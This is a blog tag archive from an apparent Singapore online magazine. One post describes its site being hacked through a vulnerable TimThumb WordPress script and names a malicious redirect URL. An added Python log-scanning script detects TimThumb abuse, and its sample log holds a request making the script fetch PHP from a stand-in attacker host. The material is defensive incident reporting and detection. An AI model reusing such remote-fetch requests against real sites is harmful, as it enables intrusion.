Tag Archive | "wordpress"

The story of the New Nation hack

[Image: a rough sketch of the fucker that broke our site.]

Thanks for sticking around guys. When New Nation was hacked earlier this month, we were rendered inaccessible for a few days, and then some. So for those of you who’re still reading us despite being potentially hit by a virus while accessing the site, you deserve a big bear hug. :)

On the 4th of September, New Nation was compromised via two possible attack vectors, XSS (Cross Site Scripting) and an outdated version of a very popular script, which ended up redirecting readers away from our articles to a malicious Russian site: http:// id-software . ru /secnow/index.php. How malicious? We’re not entirely sure, but according to Norton the site serves a trojan horse as a payload.

The most likely attack vector was a web-based attack, executed via a vulnerable WordPress plugin called TimThumb, which is a small PHP script for cropping, zooming and resizing web images (jpg, png, gif). Obviously, because it makes life a lot easier for non-technical douches like us, it’s a highly popular script and thus led to the downing of multiple sites on the day itself, including New Nation. Click here for a more technical analysis of the Timthumb.php hack, and here for a non-exhaustive list of plugins. For themes that utilise Timthumb and are thus vulnerable, click here.
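As an added example (not from the post, and not the security group's code), here is a small Python check a site owner could run over web server access logs to spot the two signs of TimThumb abuse: a `timthumb.php` request whose `src=` points at a host other than the site's own (the 2011 TimThumb issue fetched and cached such remote files, an assumption about the bug this post does not spell out), and a direct hit on a `.php` file inside a TimThumb cache directory. The log lines, the site hostname and the paths are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format access-log lines; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Sep/2011:10:01:22 +0800] "GET /wp-content/themes/demo/timthumb.php?src=http://newnation.example/wp-content/uploads/pic.jpg&w=100 HTTP/1.1" 200 5120
198.51.100.7 - - [04/Sep/2011:10:02:03 +0800] "GET /wp-content/themes/demo/timthumb.php?src=http://images.attacker.example/x.php HTTP/1.1" 200 310
198.51.100.7 - - [04/Sep/2011:10:02:09 +0800] "GET /wp-content/themes/demo/cache/external_abc123.php HTTP/1.1" 200 88
192.0.2.9 - - [04/Sep/2011:10:05:00 +0800] "GET /2011/09/some-article/ HTTP/1.1" 200 20480
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_timthumb_requests(log_text, own_hosts):
    """Return (client_ip, request_path, reason) tuples for requests that look like
    TimThumb abuse. own_hosts is the set of hostnames this site legitimately
    serves images from (assumed input)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlparse(m['path'])
        script = url.path.rsplit('/', 1)[-1].lower()
        if script in ('timthumb.php', 'thumb.php'):
            # Signal 1: src= names a URL on a host we do not own.
            for src in parse_qs(url.query).get('src', []):
                host = urlparse(src).hostname
                if host and host.lower() not in own_hosts:
                    findings.append((m['ip'], m['path'], f'remote src host {host}'))
        elif '/cache/' in url.path and script.endswith('.php'):
            # Signal 2: PHP being executed out of a cache directory, where
            # only generated image files should ever live.
            findings.append((m['ip'], m['path'], 'php file requested from cache dir'))
    return findings


if __name__ == '__main__':
    for finding in suspicious_timthumb_requests(SAMPLE_LOG, {'newnation.example'}):
        print(*finding)
```

Either finding is worth checking against the theme's or plugin's cache directory on disk; the first request here was legitimate and is not reported.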

In addition to that, a hacker had nestled a phishing site nicely within New Nation, targeted at Lloyds bank no less. We also had a nasty Perl script spewing out spam mail like no tomorrow. So some unfortunate people somewhere were getting emails from [email protected], [email protected], [email protected] and so forth.

Our original host failed to detect the outgoing spam on their servers despite us repeatedly asking for checks. And so we moved house to Amazon Web Services, which promptly informed us of the spam.

A site vulnerability assessment has since been done by a couple of security monkeys from a local IT security interest group, and things seem nice and good.

At this point you shouldn’t still be getting the Google malware warning, because we’ve cleansed and cleared the site with Google Webmaster and have been certified safe for surfing. Clear your cache, delete your browsing history and you should be good to go.

For further reading:

Phishing: http://en.wikipedia.org/wiki/Phishing

XSS: http://en.wikipedia.org/wiki/Cross-site_scripting

XSRF: http://en.wikipedia.org/wiki/Cross-site_request_forgery

Phase one

Fang Shihan

It’s Christmas Eve and I’m sitting at the dinner table fiddling around with CSS code. Poor poor arts graduate. Boohoo.

So they say, a blog template is supposed to be the least of your problems…NOT! Then again, we’re not really creating a blog, we’re creating an online magazine here, which brings a lot more internal infrastructure problems. Took me a day to create guidelines on how to file photos, for example. If we don’t set the ground rules right, it’ll be a pain to search through 1000 photos every time we need to post an article.

I’m thinking of going for a WordPress conference in Bandung next year:
http://wordcampindonesia.com/ just to not feel so stupid whenever I can’t fix stuff.

But bitching aside, we do need some help with the tech side of things. Interested in being part of a young, crazy workaholic team that aims to create the first commercial online magazine in Singapore geared towards current affairs? We’re looking for people who have one or more of the following:

1) Knowledge of WordPress
2) Knowledge of CSS code
3) Expertise in cloud computing
4) A creative flair in web design

Look for us. Money is negotiable, but we assure you, once you’re in it, you know it’ll be for more than just the money.

[p.s. as you can see, even the thumbnail isn’t loading properly. Poor geek’s head got lopped off at the top.]